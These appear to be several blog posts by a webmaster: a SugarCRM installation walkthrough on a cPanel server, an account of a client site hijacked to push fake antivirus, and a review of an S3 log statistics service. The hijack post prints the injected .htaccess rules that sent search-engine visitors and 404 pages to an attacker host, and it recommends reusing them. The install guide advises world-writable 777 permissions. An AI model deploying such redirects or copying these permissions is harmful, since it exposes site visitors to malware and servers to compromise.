What happened here?  This guy makes some cool software like Newsfire RSS for OS X.

This software has a really long list of requirements and I wouldn’t recommend it to people using shared hosting but this customer has a virtual dedicated server with WHM/Cpanel 11 on it.  Having a dedicated box (even virtualized) enables root access aka the ability to change whatever I need to in order to make things work..

The first holdup I encountered was “session save path” not being defined inside of the php.ini configuration file.

You can find the php.ini on a WHM/Cpanel server at “/usr/local/lib/”

I went and enabled it by removing the comment tag from inside of the php.ini file for it.  This did not fix the problem because  SugarCRM is picky and doesn’t like shared hosting environments.  I found this forum post that describes a work around to define this path but the author posted no examples.  My setup is hosted on a sub domain so my example is for that.

Inside of your htaccess file for the domain add the following

php_value session.save_path /home/accountuser/public_html/subdomain_directory/tmp/

Create a directory called “tmp” inside of your subdomain_directory (or whatever directory you are using) and chmod it “777″ to make it writeable.

That got me around the first hurdle.

The second holdup was also related to settings in php.ini but this is also a security/cost issue.  The software wants to be able to have users submit large files through the web interface but you could see your hosting costs rise exponentially if employees abuse this.

In any case this is a small company and they hardly use any of their bandwidth on this server so I went ahead and adjusted these settings.  You will need to look for “upload_max_filesize” and “post_max_size” inside of php.ini and make the changes as required.  After you do that the rest of the permission settings for files and folders is standard as with any web app installation.

The third holdup was the step where you need to add a database for Sugar CRM, as usual I went about trying to use Cpanel to generate a database and user.  Unusually though this did not work, I could not get SugarCRM to use any database with a user I created.  Admittedly I didn’t play with this or do any googling on the topic I just went into WHM to open PHPMyAdmin as root and created a new user/database inside of that.  The database created through PHPMyAdmin worked perfectly and I was able to move forward.

The fourth holdup was the installer outputting some permission denied errors that ended with “sugar_file_utils.php on line 59″.  I found a great topic on the forums that quickly informed me that the Sugar CRM software requires the apache user account to be the owner of the folder that Sugar CRM is resides in.  I search Google for the account that WHM uses but was unable to find anything useful.  I changed tactics and searched for a way to display the user running apache, sure enough I found a way to display that in moments.

Display the user running apache with this command “ps aux | grep apache”

The user came back as “nobody” so I went and added them as the owner of my “subdomain_directory”

Run the command  “chown -R nobody.nobody /home/accountuser/public_html/subdomain_directory/”

After that SugarCRM let me login with the username and password I had setup which makes this install one of the least simple I have ever worked with but at the sametime a certainly doable project.

One of my clients from last year recently had their site hijacked by people with less than honorable intentions. All traffic coming from Google and all the error pages on the site were being redirected to a download for win antivir 2009.

The details are still emerging on how the site was compromised but from the information that I have I think the cause can be narrowed down to either an unpatched CMS or the host themselves was hijacked.   I have now locked down the CMS control panel down so you can’t access it via the web anymore, hopefully this keeps the baddies at bay for a little while.

Fun, Fun, for this company and even more fun for me since I had recently experienced this hijack as a user when Googling a local restaurants site.  Through whatever means they used to hijack the site they were able to inject the following into the .htaccess file.

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://255.255.255.255/in.html?s=example [R,L]
Errordocument 404 http://255.255.255.255/in.html?s=example

The reason I am sharing this is that there are a lot of legitimate uses for this type of script,  I hope that some of you other webmasters out there can use it.  One example would be a site administrator who wanted to redirect search engine traffic to sign up pages while still letting Google index the site.

Then I found:  http://www.s3stat.com/

One trip to their website and you’ll find everything they do clearly explained but assuming your to lazy to click here is a summary straight from their homepage.

S3STAT is a service that takes the detailed server access logs provided by Amazon’s Simple Storage Service (S3), and translates them into human readable statistics, reports and graphs.

Every night, we’ll download your access logs, translate them, sort them, and run them through Webalizer, the industry-standard web analytics reporting package. We’ll take the processed log files and reports, and stick them right back into your Amazon S3 Bucket for you to view.

In other words I get decent stats from my Amazon S3 account for $2/month.  Its only day one for me but it seems like a good service, I only wish they had an option to view logs using Awstats because 1999 called and they want the shitty interface that Webalizer uses back.